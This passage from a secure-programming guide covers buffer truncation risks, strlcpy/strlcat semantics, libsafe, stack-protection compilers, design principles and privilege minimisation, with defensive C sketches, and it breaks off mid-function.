are useful for dealing with statically allocated buffers.
This is a programming approach where a buffer is allocated for
the ``longest useful size'' and then it stays a fixed size from then on.
The alternative is to dynamically reallocate buffer sizes as you need them.
It turns out that both approaches have security implications.
</para>

<para>
<!-- Thanks to Ryan McCabe (thanks.odin@numb.org) for the comment
     that fixed-length buffers have their own exploitable problems. -->
There is a general security problem when using fixed-length buffers: the fact
that the buffer is a fixed length may be exploitable.
This is a problem with strncpy(3) and strncat(3), snprintf(3),
strlcpy(3), strlcat(3), and other such functions.
The basic idea is that the attacker sets up a really long string so that,
when the string is truncated, the final result will be what the
attacker wanted (instead of what the developer intended).
Perhaps the string is concatenated from several smaller
pieces; the attacker might make the first piece as long as the entire
buffer, so all later attempts to concatenate strings do nothing.
Here are some specific examples:

<itemizedlist>
<listitem>

<para>
Imagine code that calls gethostbyname(3) and, if
successful, immediately copies hostent-&#62;h&lowbar;name to a
fixed-size buffer using strncpy or snprintf.
Using strncpy or snprintf protects against an overflow of an excessively
long fully-qualified domain name (FQDN), so you might think you're done.
However, this could result in chopping off the end of the FQDN.
This may be very undesirable, depending on what happens next.
</para>
</listitem>
<listitem>

<para>
Imagine code that uses strncpy, strncat, snprintf, etc., to copy the
full path of a filesystem object to some buffer.
Further imagine that the original value was provided by an
untrusted user, and that the copying is part of a process to pass a
resulting computation to a function.
Sounds safe, right?
Now imagine that an attacker pads a path
with a large number of '/'s at the beginning.  This could
result in future operations being performed on the file ``/''.
If the program appends values in the belief that the result will be safe,
the program may be exploitable.
Or, the attacker could devise a long filename near the buffer length, so that
attempts to append to the filename would silently fail to occur
(or only partially occur in ways that may be exploitable).
</para>
</listitem>

</itemizedlist>

</para>

<para>
When using statically-allocated buffers,
you really need to consider the length of the source and destination arguments.
Sanity checking the input and the resulting intermediate computation might
deal with this, too.
</para>
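<para>
One way to act on this is to treat truncation as an error instead of
quietly continuing with a shortened value.
The following is a minimal sketch using snprintf(3); the helper name
join_path and its return convention are assumptions made for
illustration.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

/* Build "dir/name" in out (out_size bytes).  Returns 0 on success and
   -1 if the result did not fit, so the caller can reject the input
   instead of continuing with a silently truncated path.
   join_path is a hypothetical helper name. */
int join_path(char *out, size_t out_size, const char *dir, const char *name)
{
    int n = snprintf(out, out_size, "%s/%s", dir, name);

    /* C99 snprintf() returns the length the full result would have had;
       a negative value is an error, and a value of out_size or more
       means the output was truncated. */
    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return 0;
}
```
]]>
</programlisting>
A caller that gets -1 back should stop processing that input; the
contents of the buffer are a truncated path and should not be used.
</para>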

<para>
Another alternative is to dynamically reallocate all strings instead of using
fixed-size buffers.
This general approach is recommended by the GNU programming guidelines,
since it permits programs to handle arbitrarily-sized inputs
(until they run out of memory).
Of course, the major problem with dynamically allocated strings is that you
may run out of memory.  The memory may even be exhausted at some other
point in the program than the portion where you're worried about buffer
overflows; any memory allocation can fail.
Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though
technically there is enough virtual memory available to the program
to continue.
In addition, before running out of memory the program will probably
use a great deal of virtual memory; this can easily result in
``thrashing'', a situation in which the computer spends all its time
just shuttling information between the disk and memory (instead of
doing useful work).
This can have the effect of a denial of service attack.
Some rational limits on input size can help here.
In general, the program must be designed to
fail safely when memory is exhausted if you use dynamically allocated strings.
</para>
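<para>
The following minimal sketch combines the ideas above: the buffer grows
as needed, but only up to a limit, and every allocation failure is
handled without leaking memory.
The function name read_line_limited and the limit MAX_LINE are
hypothetical; a real program would pick a limit that suits its input.
<programlisting>
<![CDATA[
```c
#include <stdio.h>
#include <stdlib.h>

/* MAX_LINE is a hypothetical application limit on input size. */
#define MAX_LINE ((size_t)1 << 20)

/* Read one line from fp into a newly allocated NIL-terminated string
   (without the newline).  Returns NULL at end of input, if the line
   would need a buffer larger than MAX_LINE bytes, or if memory runs
   out; the caller must free() the result. */
char *read_line_limited(FILE *fp)
{
    size_t cap = 64, len = 0;
    char *buf = malloc(cap);
    int c;

    if (buf == NULL)
        return NULL;

    while ((c = getc(fp)) != EOF && c != '\n') {
        if (len + 1 >= cap) {               /* keep room for the NIL */
            char *bigger;
            if (cap >= MAX_LINE) {          /* refuse oversized input */
                free(buf);
                return NULL;
            }
            cap *= 2;
            bigger = realloc(buf, cap);
            if (bigger == NULL) {           /* fail safely: no leak */
                free(buf);
                return NULL;
            }
            buf = bigger;
        }
        buf[len++] = (char)c;
    }
    if (c == EOF && len == 0) {             /* nothing left to read */
        free(buf);
        return NULL;
    }
    buf[len] = '\0';
    return buf;
}
```
]]>
</programlisting>
</para>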

</sect2>

<sect2 id="strlcpy">
<title>strlcpy and strlcat</title>

<para>
An alternative, being employed by OpenBSD, is the
strlcpy(3) and strlcat(3) functions by Miller and de Raadt [Miller 1999].
This is a minimalist, statically-sized buffer approach that provides C string
copying and concatenation with a different (and less error-prone) interface.
Source and documentation of these functions
are available under a newer BSD-style open source license at
<ulink
url="ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3">ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3</ulink>.
</para>

<para>
First, here are their prototypes:

<screen width="61">
size_t strlcpy (char *dst, const char *src, size_t size);
size_t strlcat (char *dst, const char *src, size_t size);
</screen>

Both strlcpy and strlcat
take the full size of the destination buffer as a parameter
(not the maximum number of characters to be copied) and guarantee to
NIL-terminate the result (as long as size is larger than 0).
Remember that you should include a byte for NIL in the size.
</para>

<para>
The strlcpy function copies up to
size-1 characters from the NIL-terminated string src to dst,
NIL-terminating the result.
The strlcat
function appends the NIL-terminated string
src to the end of dst.
It will append at most
size - strlen(dst) - 1 bytes, NIL-terminating the result.
</para>
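<para>
For systems that lack these functions, the behavior described above can
be sketched in a few lines.
The code below is my own minimal illustration under the hypothetical
names my_strlcpy and copy_checked; it is not the OpenBSD source.
It relies on the fact that strlcpy returns the length of src, which
makes truncation easy to detect.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* A minimal sketch of the documented strlcpy() behavior, under the
   hypothetical name my_strlcpy; this is not the OpenBSD source. */
size_t my_strlcpy(char *dst, const char *src, size_t size)
{
    size_t src_len = strlen(src);

    if (size > 0) {
        /* Copy at most size-1 characters, then terminate. */
        size_t n = (src_len < size - 1) ? src_len : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return src_len;     /* the length the caller tried to create */
}

/* Returns 0 if src fit in dst, -1 if it had to be truncated. */
int copy_checked(char *dst, size_t size, const char *src)
{
    return (my_strlcpy(dst, src, size) < size) ? 0 : -1;
}
```
]]>
</programlisting>
</para>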

<para>
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are
not, by default, installed in most Unix-like systems.
In OpenBSD, they are part of &lt;string.h&gt;.
This is not that difficult a problem; since they are small functions, you can
even include them in your own program's source (at least as an option),
and create a small separate package to load them.
You can even use autoconf to handle this case automatically.
If more programs use these functions, it won't be long before these are
standard parts of Linux distributions and other Unix-like systems.
Also, these functions have
been recently added to the ``glib'' library (I submitted the patch
to do this), so using recent versions of glib makes them available.
In glib these functions are named g_strlcpy and g_strlcat
(not strlcpy or strlcat) to be consistent with the glib library
naming conventions.
</para>

<para>
Also, strlcat(3) has slightly varying semantics
when the provided size is 0 or if there are no NIL characters in
the destination string dst (inside the given number of characters).
In OpenBSD, if the size is 0, then the destination string's length is
considered 0.
Also, if size is nonzero, but there are no NIL characters
in the destination string (in the size number of characters), then
the length of the destination is considered equal to the size.
These rules make handling strings without embedded NILs consistent.
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
because they weren't specified in the original documentation.
I've talked to Todd Miller, and he and I agree that the OpenBSD
semantics are the correct ones (and that Solaris is incorrect).
The reasoning is simple: under no condition should strlcat or strlcpy
ever examine characters in the destination outside of the range of size;
such access might cause core dumps (from accessing out-of-range memory)
and even hardware interactions (through memory-mapped I/O).
Thus, given:
<screen width="61">
  a = strlcat ("Y", "123", 0);
</screen>
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
because it incorrectly looks at characters beyond the "size" length in
the destination.
For now, I suggest avoiding cases where the size is 0 or the destination
has no NIL characters.
Future versions of glib will hide this difference and always use the OpenBSD
semantics.
</para>
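<para>
The OpenBSD semantics described above can be sketched as follows.
Again, this is only an illustration under the hypothetical name
my_strlcat, not the OpenBSD source; what matters is that the search for
the end of dst never looks beyond size bytes.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* A sketch of strlcat() with the OpenBSD semantics described above,
   under the hypothetical name my_strlcat; not the OpenBSD source. */
size_t my_strlcat(char *dst, const char *src, size_t size)
{
    size_t src_len = strlen(src);
    size_t dst_len = 0;
    size_t room, n;

    /* Look for the end of dst, but never beyond size bytes. */
    while (dst_len < size && dst[dst_len] != '\0')
        dst_len++;

    /* No NIL within size bytes (or size is 0): append nothing and
       treat the destination's length as equal to size. */
    if (dst_len == size)
        return size + src_len;

    room = size - dst_len - 1;          /* bytes available for src */
    n = (src_len < room) ? src_len : room;
    memcpy(dst + dst_len, src, n);
    dst[dst_len + n] = '\0';
    return dst_len + src_len;
}
```
]]>
</programlisting>
With this sketch, a size of 0 and a src of "123" yields 3, because the
destination is never examined.
</para>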

</sect2>

<sect2 id="libmib">
<title>libmib</title>

<para>
One toolset for C that dynamically reallocates strings automatically
is the ``libmib allocated string functions'' by
Forrest J. Cavalier III, available at
<ulink
url="http://www.mibsoftware.com/libmib/astring">http://www.mibsoftware.com/libmib/astring</ulink>.
There are two variations of libmib: ``libmib-open'' and ``libmib-mature''.
The ``libmib-open'' variation appears to be clearly
open source under its own X11-like license that
permits modification and redistribution, although redistributions must choose
a different name.
However, the developer states that it
``may not be fully tested.''
To continuously get libmib-mature, you must pay for a subscription.
The documentation is not open source, but it is freely available.
</para>

</sect2>

<sect2 id="std-string">
<title>C++ std::string class</title>

<para>
C++ developers can use the std::string class, which is part of the
C++ standard library.
This is a dynamic approach, as the storage grows as necessary.
However, it's important to note that if that class's data is turned
into a ``char *'' (e.g., by using data() or c_str()),
the possibilities of buffer overflow resurface, so you need to be careful
when using such methods.
Note that c_str() always returns a NIL-terminated string, but
data() may or may not (in C++ standards before C++11 it's implementation
dependent, and most
implementations do not include the NIL terminator).
Avoid using data(), and if you must use it, don't be dependent on its format.
</para>

<para>
Many C++ developers use other string libraries as well, such as
those that come with other large libraries or even home-grown string libraries.
With those libraries, be especially careful - many
alternative C++ string classes
include routines to automatically convert the class to a ``char *'' type.
As a result, they can silently introduce buffer overflow vulnerabilities.
</para>

</sect2>

<sect2 id="libsafe">
<title>Libsafe</title>

<para>
Arash Baratloo, Timothy Tsai, and Navjot Singh
(of Lucent Technologies)
have developed Libsafe, a wrapper of several library functions known to be
vulnerable to stack smashing attacks.
This wrapper (which they call a kind of ``middleware'')
is a simple dynamically loaded library that contains modified versions
of C library functions such as strcpy(3).
These modified versions
implement the original functionality, but in a manner that ensures
that any buffer overflows are contained within the current stack frame.
Their initial performance analysis suggests that this
library's overhead is very small.
Libsafe papers and source code are available at
<ulink url="http://www.research.avayalabs.com/project/libsafe">
http://www.research.avayalabs.com/project/libsafe</ulink>.
<!-- <ulink url="http://www.bell-labs.com/org/11356/libsafe.html">http://www.bell-labs.com/org/11356/libsafe.html</ulink>.
-->
The Libsafe source code is available under the completely
open source LGPL license.
</para>

<para>
Libsafe's approach appears somewhat useful.
Libsafe should certainly be considered for inclusion by Linux
distributors, and its approach is worth considering by others as well.
For example, I know that the Mandrake distribution of Linux (version
7.1) includes it.
<!-- http://www.sopac.org/linux/RPM/mandrake/7.1/Mandrake/RPMS2/Linux-Mandrake.html -->
However, from a software developer's point of view, Libsafe is a useful
mechanism to support defense-in-depth, but it does not really prevent buffer
overflows.
Here are several reasons why you shouldn't depend just on Libsafe
during code development:
<itemizedlist>

<listitem><para>
Libsafe only protects a small set of known functions with obvious
buffer overflow issues.
At the time of this writing, this list is significantly shorter than
the list of functions in this book known to have this problem.
It also won't protect against code you write yourself (e.g., in
a while loop) that causes buffer overflows.
</para></listitem>

<listitem><para>
Even if libsafe is installed in a distribution, the way it is installed
impacts its use.
The documentation recommends setting LD_PRELOAD
to cause libsafe's protections to be enabled, but the problem
is that users can unset this environment variable... causing the
protection to be disabled for programs they execute!
</para></listitem>

<listitem><para>
Libsafe only protects against buffer overflows of the stack onto the
return address;
you can still overrun the heap or other variables in that procedure's frame.
</para></listitem>

<listitem><para>
Unless you can be assured that all deployed platforms will use libsafe
(or something like it), you'll have to protect your program as though
it wasn't there.
</para></listitem>


<listitem><para>
Libsafe seems to assume that saved frame pointers are at the beginning of
each stack frame.  This isn't always true.
Compilers (such as gcc) can optimize away things, and in particular the
option "-fomit-frame-pointer" removes the information that libsafe
seems to need.
Thus, libsafe may fail to work for some programs.
<!-- More info at:
  http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/109/1.html
  http://www2.merton.ox.ac.uk/~security/security-audit-200004/0069.html -->
</para></listitem>
</itemizedlist>
</para>

<para>
The libsafe developers themselves acknowledge that software developers
shouldn't just depend on libsafe.
In their words:

<blockquote><para>
It is generally accepted that the best solution to
buffer overflow attacks is to fix the defective programs.
However, fixing defective programs requires knowing that
a particular program is defective.
The true benefit of using libsafe and other alternative
security measures is protection against future attacks
on programs that are not yet known to be vulnerable.
</para></blockquote>
</para>
</sect2>

<sect2 id="other-buffer-libraries">
<title>Other Libraries</title>

<para>
The glib (not glibc) library is a widely-available
open source library that provides
a number of useful functions for C programmers.
GTK+ and GNOME both use glib, for example.
As I noted earlier, in glib version 1.3.2, g_strlcpy() and g_strlcat() have
been added through a patch which I submitted. This should make it easier to
portably use those functions once these later versions of glib
become widely available.
At this time I do not have an analysis showing definitively that the
glib library functions protect against buffer overflows.
However, many of the glib functions automatically allocate memory,
and those functions automatically
<emphasis>fail with no reasonable way to intercept the failure</emphasis>
(e.g., to try something else instead).
As a result, many glib functions cannot
be used in most secure programs.
The GNOME guidelines recommend using functions such as
g_strdup_printf(), which is fine as long as it's okay if your program
immediately crashes if an out-of-memory condition occurs.
However, if you can't accept this, then using such routines isn't appropriate.
</para>

<!--
??? Need to investigate if standard demands safety.
C++ has a set of string classes and templates as well
(see basic&lowbar;string and string)
-->

</sect2>

</sect1>

<sect1 id="compilation-c">
<title>Compilation Solutions in C/C++</title>

<para>
A completely different approach is to use compilation methods that perform
bounds-checking (see [Sitaker 1999] for a list).
In my opinion, such tools are very useful in having multiple layers of
defense, but it's not wise to use this technique as your sole defense.
There are at least two reasons for this.
First of all, such tools generally only provide a partial defense against
buffer overflows (and the ``complete'' defenses are generally
12-30 times slower); C and C++ were simply not designed to protect
against buffer overflows.
<!--
See Bugtraq, 23 Apr 2002,
Iván Arce <core.lists.bugtraq@core-sdi.com>,
which discusses how to circumvent them.
-->
Second of all, for open source programs you cannot be certain what tools
will be used to compile the program; using the default ``normal'' compiler
for a given system might suddenly open security flaws.
</para>

<para>
One of the more useful tools is ``StackGuard'', a modification of the
standard GNU C compiler gcc.
StackGuard works by inserting a ``guard'' value (called a ``canary'')
in front of the return address; if a buffer overflow
overwrites the return address, the canary's value (hopefully) changes
and the system detects this before using it.
This is quite valuable, but note that this does not protect against
buffer overflows overwriting other values (which they may still be able
to use to attack a system).
There is work to extend StackGuard to be able to add canaries to other
data items, called ``PointGuard''.
PointGuard will automatically protect certain values (e.g., function
pointers and longjmp buffers).
However, protecting other variable types using PointGuard
requires specific programmer intervention (the programmer
has to identify which data values must be protected with canaries).
This can be valuable, but it's easy to accidentally omit
protection for a data value you didn't think needed protection -
but needs it anyway.
More information on StackGuard, PointGuard, and other alternatives
is in Cowan [1999].
</para>

<para>
<ulink url="http://www.trl.ibm.com/projects/security/ssp">
IBM has developed a stack protection system called ProPolice
based on the ideas of StackGuard</ulink>.
IBM doesn't use the name ProPolice on its current website - it's just called
a "GCC extension for protecting applications from stack-smashing attacks."
Like StackGuard, ProPolice
is a GCC (GNU Compiler Collection) extension for
protecting applications from stack-smashing attacks.
Applications written in C are protected by automatically inserting
protection code into an application at compilation time.
ProPolice differs slightly from StackGuard, however, in adding
three features:
(1) reordering local variables to place buffers after pointers
(to avoid the corruption of pointers that could be used
to further corrupt arbitrary memory locations),
(2) copying pointers in function arguments to an area
preceding local variable buffers (to prevent the corruption of pointers
that could be used to further corrupt arbitrary memory locations), and
(3) omitting instrumentation code from some functions
(it basically assumes that only character arrays are dangerous; while
this isn't strictly true, it's mostly true, and as a result ProPolice
has better performance while retaining most of its protective capabilities).
The IBM website includes information for how to build Red Hat Linux and
FreeBSD with this protection;
<ulink url="http://www.deadly.org/article.php3?sid=20021202175508">OpenBSD
has already added ProPolice to their base system</ulink>.
I think this is extremely promising, and I hope to see this capability included
in future versions of gcc and used in various distributions.
In fact, I think this kind of capability should be the default -
this would mean that the largest single class of attacks would no longer
enable attackers to take control in most cases.
</para>

<para>
As a related issue, in Linux you could modify the Linux kernel so that
the stack segment is not executable; such a patch to Linux does exist
(see Solar Designer's patch, which includes this, at
<ulink
url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>).
However, as of this writing this is not built into the Linux kernel.
Part of the rationale is that this is less protection than it seems;
attackers can simply force the system to call other ``interesting'' locations
already in the program (e.g., in its library, the heap,
or static data segments).
Also, sometimes Linux does require executable code in the stack,
e.g., to implement signals and to implement GCC ``trampolines''.
Solar Designer's patch does handle these cases, but this does
complicate the patch.
Personally, I'd like to see this merged into the main Linux
distribution, since it does make attacks somewhat more difficult and
it defends against a range of existing attacks.
However, I agree with Linus Torvalds and others
that this does not add the amount of protection it would appear to and
can be circumvented with relative ease.
You can read Linus Torvalds' explanation for not including this support at
<!-- was: http://lwn.net/980806/a/linus-noexec.html -->
<ulink url="http://old.lwn.net/1998/0806/a/linus-noexec.html">
http://old.lwn.net/1998/0806/a/linus-noexec.html</ulink>.

</para>

<para>
In short, it's better to work first on developing a correct program
that defends itself against buffer overflows.
Then, after you've done this, by all means use techniques and tools
like StackGuard as an additional safety net.
If you've worked hard to eliminate buffer overflows in the code itself,
then StackGuard (and tools like it)
are likely to be more effective because there will be
fewer ``chinks in the armor'' that StackGuard will be called on to protect.
</para>

</sect1>

<sect1 id="other-languages">
<title>Other Languages</title>

<para>
The problem of buffer overflows is an excellent argument for using
other programming languages
such as Perl, Python, Java, and Ada95.
After all, nearly all other programming languages used today
(other than assembly language) protect against buffer overflows.
Using those other languages does not eliminate all problems, of course;
in particular see the discussion in <xref linkend="handle-metacharacters">
regarding the NIL character.
There is also the problem of ensuring that those other languages'
infrastructure (e.g., run-time library) is available and secured.
Still, you should certainly consider using other programming languages
when developing secure programs to protect against buffer overflows.
</para>

</sect1>

</chapter>

<chapter id="internals">
<title>Structure Program Internals and Approach</title>

<epigraph>
<attribution>Proverbs 25:28 (NIV)</attribution>
<para>
Like a city whose walls are broken down is a man who lacks self-control.
</para>
</epigraph>

<sect1 id="follow-good-principles">
<title>Follow Good Software Engineering Principles for Secure Programs</title>

<para>
Saltzer [1974] and later Saltzer and Schroeder [1975]
list the following principles of the design of secure
protection systems, which are still valid:

<itemizedlist>
<listitem>

<para>
<emphasis remap="it">Least privilege</emphasis>.
Each user and program should operate using the fewest privileges possible.
This principle limits the damage from an accident, error, or attack.
It also reduces the number of potential interactions among privileged programs,
so unintentional,
unwanted, or improper uses of privilege are less likely to occur.
This idea can be extended to the internals of a program: only the smallest
portion of the program which needs those privileges should have them.
See <xref linkend="minimize-privileges"> for more about how to do this.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Economy of mechanism/Simplicity</emphasis>.
The protection system's design should be as simple and
small as possible.
In their words,
``techniques such as line-by-line inspection of software and physical
examination of hardware that implements protection mechanisms are necessary.
For such techniques to be successful, a small and simple design is essential.''
This is sometimes described as the ``KISS'' principle
(``keep it simple, stupid'').
</para>
</listitem>


<listitem>
<para>
<emphasis remap="it">Open design</emphasis>.
The protection mechanism must not depend on attacker ignorance.
Instead, the mechanism should be public, depending on the secrecy of
relatively few (and easily changeable) items like passwords or private keys.
An open design makes extensive public scrutiny possible, and it also
makes it possible for users to convince themselves that the system about
to be used is adequate.
Frankly, it isn't realistic to try to maintain secrecy for a system that
is widely distributed;
decompilers and subverted hardware can quickly expose any ``secrets''
in an implementation.
Bruce Schneier argues that smart engineers should ``demand
open source code for anything related to security'',
as well as ensuring that it receives widespread review and that
any identified problems are fixed [Schneier 1999].
</para>
</listitem>

<listitem>
<para>
<emphasis remap="it">Complete mediation</emphasis>.
Every access attempt must be checked; position the mechanism
so it cannot be subverted.
For example, in a client-server model, generally the server must do all
access checking because users can build or modify their own clients.
This is the point of all of
<xref linkend="input">, as well as
<xref linkend="secure-interface">.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Fail-safe defaults (e.g., permission-based approach)</emphasis>.
The default should be to deny access, and the
protection scheme should then identify conditions under which
access is permitted.
See <xref linkend="safe-configure"> and <xref linkend="fail-safe">
for more.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Separation of privilege</emphasis>.
Ideally, access to objects should depend on more than one condition, so
that defeating one protection system won't enable complete access.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Least common mechanism</emphasis>.
Minimize the amount and
use of shared mechanisms (e.g. use of the /tmp or /var/tmp directories).
Shared objects provide potentially dangerous channels for information
flow and unintended interactions.
See <xref linkend="avoid-race"> for more information.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Psychological acceptability / Easy to use</emphasis>.
The human interface must be designed for ease of use so users will routinely
and automatically use the protection mechanisms correctly.
Mistakes will be reduced if
the security mechanisms closely match the user's mental image of
his or her protection goals.
</para>
</listitem>

</itemizedlist>

</para>

<para>
A good overview of various design principles for security is available in
Peter Neumann's
<ulink url="http://www.csl.sri.com/users/neumann/chats.html#4">
Principled Assuredly Trustworthy Composable Architectures</ulink>.
<!--
???: Add:
http://www.csl.sri.com/neumann/chats2.pdf
http://www.csl.sri.com/neumann/chats2.ps
-->

</para>
</sect1>

<sect1 id="secure-interface">
<title>Secure the Interface</title>

<para>
Interfaces should be minimal (as simple as possible), narrow
(provide only the functions needed), and non-bypassable.
Trust should be minimized.
Consider limiting the data that the user can see.
</para>
</sect1>

<sect1 id="data-vs-control">
<title>Separate Data and Control</title>
<para>
Any files you support should be designed to completely separate
(passive) data from programs that are executed.
Applications and data viewers may be used to
display files developed externally, so in general don't allow them
to accept programs (also known as ``scripts'' or ``macros'').
The most dangerous kind is an auto-executing macro that executes
when the application is loaded and/or when the data is initially
displayed; from a security point-of-view this is generally
a disaster waiting to happen.
</para>

<para>
If you truly must support programs downloaded remotely
(e.g., to implement an existing standard), make sure that you
have extremely strong control over what the macro can do
(this is often called a ``sandbox'').
Past experience has shown that real sandboxes are hard to implement correctly.
In fact, I can't remember a single widely-used sandbox that hasn't been
repeatedly exploited (yes, that includes Java).
If possible, at least have the programs stored in a separate file, so that
it's easier to block them out when another sandbox flaw has been found
but not yet fixed.
Storing them separately also makes it easier to reuse code and to cache
it when helpful.
</para>
</sect1>

<sect1 id="minimize-privileges">
<title>Minimize Privileges</title>

<para>
As noted earlier, it is an important general
principle that a program have the minimal set of privileges
necessary to do its job (this is termed ``least privilege'').
That way, if the program is broken, its damage is limited.
The most extreme example is to simply not write a secure program at all -
if this can be done, it usually should be.
For example, don't make your program setuid or setgid if you can avoid it; just
make it an ordinary program, and require the administrator to log in as
the privileged user before running it.
</para>

<para>
In Linux and Unix, the primary determiner of a process' privileges
is the set of id's associated with it:
each process has a real, effective and saved id for both the user and group
(a few very old Unixes don't have a ``saved'' id).
Linux also has, as a special extension, a separate filesystem UID and GID
for each process.
Manipulating these values is critical to keeping privileges minimized,
and there are several ways to minimize them (discussed below).
You can also use chroot(2) to minimize the files visible to a program,
though chroot() can be difficult to use correctly.
There are a few other values determining privilege in Linux and Unix, for
example, POSIX capabilities (supported by Linux 2.2 and greater, and by
some other Unix-like systems).
</para>

<sect2 id="mimimize-privileges-granted">
<title>Minimize the Privileges Granted</title>

<para>
Perhaps the most effective technique is to simply minimize
the highest privilege granted.
In particular, avoid granting a program root privilege if possible.
Don't make a program <emphasis remap="it">setuid root</emphasis> if it only needs access
to a small set of files;
consider creating separate user or group accounts for different functions.
</para>

<para>
A common technique is to
create a special group, change a file's group ownership to that group,
and then make the program <emphasis remap="it">setgid</emphasis> to that group.
It's better to make a program <emphasis remap="it">setgid</emphasis> instead of <emphasis remap="it">setuid</emphasis>
where you can,
since group membership grants fewer rights (in particular, it does not
grant the right to change file permissions).
</para>

<para>
This is commonly done for game high scores.
Games are usually setgid <emphasis remap="it">games</emphasis>,
the score files are owned by the group <emphasis remap="it">games</emphasis>,
and the programs themselves and their configuration files
are owned by someone else (say root).
Thus, breaking into a game allows the perpetrator to change high scores but
doesn't grant the privilege to change the game's executable or
configuration file.
The latter is important; if an attacker could change a game's executable
or its configuration files (which might control what the executable runs),
then they might be able to gain control of a user who ran the game.
</para>

<para>
If creating a new group isn't sufficient, consider creating a
new pseudouser (really, a special role) to manage a set of resources -
often a new pseudogroup (again, a special role) is also created just
to run a program.
Web servers typically do this; often web servers are set up with a special
user (``nobody'') so that they can be isolated from other users.
Indeed, web servers are instructive here: web servers typically need
root privileges to start up (so they can attach to port 80), but once
started they usually shed all their privileges and run as the user ``nobody''.
However, don't use the ``nobody'' account (unless you're writing a
webserver); instead, create your own pseudouser or new group.
The purpose of this approach is to isolate different programs,
processes, and data from each other,
by exploiting the operating system's ability to keep users and groups separate.
If different programs shared the same account, then breaking into one program
would also grant privileges to the other.
Usually the pseudouser should not own the programs it runs;
that way, an attacker who breaks into the account cannot change
the program it runs.
By isolating different parts of the system into running as separate users
and groups, breaking one part will not necessarily break the
whole system's security.
<!--
Martijn Vernooij noted http://httpd.apache.org/docs/mod/core.html#user :

 The user should have no privileges which result in it being able to
access files which are not intended to be visible to the outside world,
and similarly, the user should not be able to execute code which is not
meant for httpd requests. It is recommended that you set up a new user
and group specifically for running the server. Some admins use user nobody,
but this is not always possible or desirable.
-->
</para>

<para>
If you're using a database system (say, by calling its query interface),
limit the rights of the database user that the application uses.
For example, don't give that user access to all of the system stored procedures
if that user only needs access to a handful of user-defined ones.
Do everything you can inside stored procedures.
That way, even if someone does manage to force arbitrary strings into the
query, the damage that can be done is limited.
If you must directly pass a regular SQL query with client supplied data
(and you usually shouldn't), wrap it in something that limits its activities
(e.g., sp_sqlexec).
(My thanks to SPI Labs for these database system suggestions).
<!-- http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf -->
</para>

<para>
If you <emphasis remap="it">must</emphasis> give a program privileges
usually reserved for root,
consider using POSIX capabilities to minimize the privileges
available to your program as soon as it can.
POSIX capabilities are available in Linux 2.2 and in many other
Unix-like systems.
By calling cap&lowbar;set&lowbar;proc(3) or the Linux-specific capsetp(3)
routines immediately after starting, you can permanently
reduce the abilities of your program to just those abilities it actually needs.
For example, the network time daemon (ntpd) traditionally has run as root,
because it needs to modify the current time.
However, patches have been developed so ntpd only needs a single
capability, CAP_SYS_TIME, so even if an attacker gains control over
ntpd it's somewhat more difficult to exploit the program.
</para>

<para>
I say ``somewhat more difficult'' because, unless other steps are taken,
retaining a privilege using POSIX capabilities
requires that the process continue to have the root user id.
Because many important files (configuration files, binaries, and so on)
are owned by root, an attacker controlling a program
with such limited capabilities can still modify
key system files and gain full root-level privilege.
A Linux kernel extension (available in versions 2.4.X and 2.2.19+)
<!-- It's available from 2.3.99-pre3 on, but now that 2.4's released the
     exact development version is only of academic interest.
     Chris Evans thought it might also be available in 2.2.18, but wasn't
     sure, so I thought I'd be safe and specify 2.2.19. -->
provides a better way to limit the available privileges:
a program can start as root (with all POSIX capabilities),
prune its capabilities down to just what it needs, call
prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a
non-root process.
The PR_SET_KEEPCAPS setting marks a process so that when a process does
a setuid to a nonzero value, the capabilities aren't cleared
(normally they are cleared).
This process setting is cleared on exec().
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer
versions of the Linux kernel.
</para>
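
<para>
The sequence just described might be sketched roughly as follows.
This is only an illustration under several assumptions: the function
names only_capability() and become_user_keeping() are hypothetical,
the raw capset system call is used (instead of the libcap routines)
purely to keep the example self-contained, and the capability structure
version shown is the one used by current Linux kernels.
Note that the sketch changes the user and group ids
<emphasis>before</emphasis> pruning the capability set, because
setuid() and setgid() themselves require capabilities that the final
set no longer contains.

<programlisting><![CDATA[
```c
#define _DEFAULT_SOURCE          /* for setgroups() and syscall() on glibc */
#include <grp.h>
#include <linux/capability.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Fill a two-word capability set so that only `cap` is permitted and
 * effective; nothing is inheritable. */
void only_capability(struct __user_cap_data_struct data[2], int cap)
{
    memset(data, 0, 2 * sizeof data[0]);
    data[CAP_TO_INDEX(cap)].permitted = CAP_TO_MASK(cap);
    data[CAP_TO_INDEX(cap)].effective = CAP_TO_MASK(cap);
}

/* Start as root, end as (uid, gid) holding only `cap`.
 * Returns 0 on success, -1 on any failure (the caller should then exit). */
int become_user_keeping(uid_t uid, gid_t gid, int cap)
{
    struct __user_cap_header_struct hdr;
    struct __user_cap_data_struct data[2];

    /* Ask the kernel not to clear permitted capabilities on setuid(). */
    if (prctl(PR_SET_KEEPCAPS, 1, 0, 0, 0) != 0)
        return -1;

    /* Drop groups and ids while we still hold the right to do so. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;

    /* Prune to the single capability and make it effective again
     * (the effective set is emptied by the uid change). */
    memset(&hdr, 0, sizeof hdr);
    hdr.version = _LINUX_CAPABILITY_VERSION_3;
    hdr.pid = 0;                 /* 0 means the calling thread */
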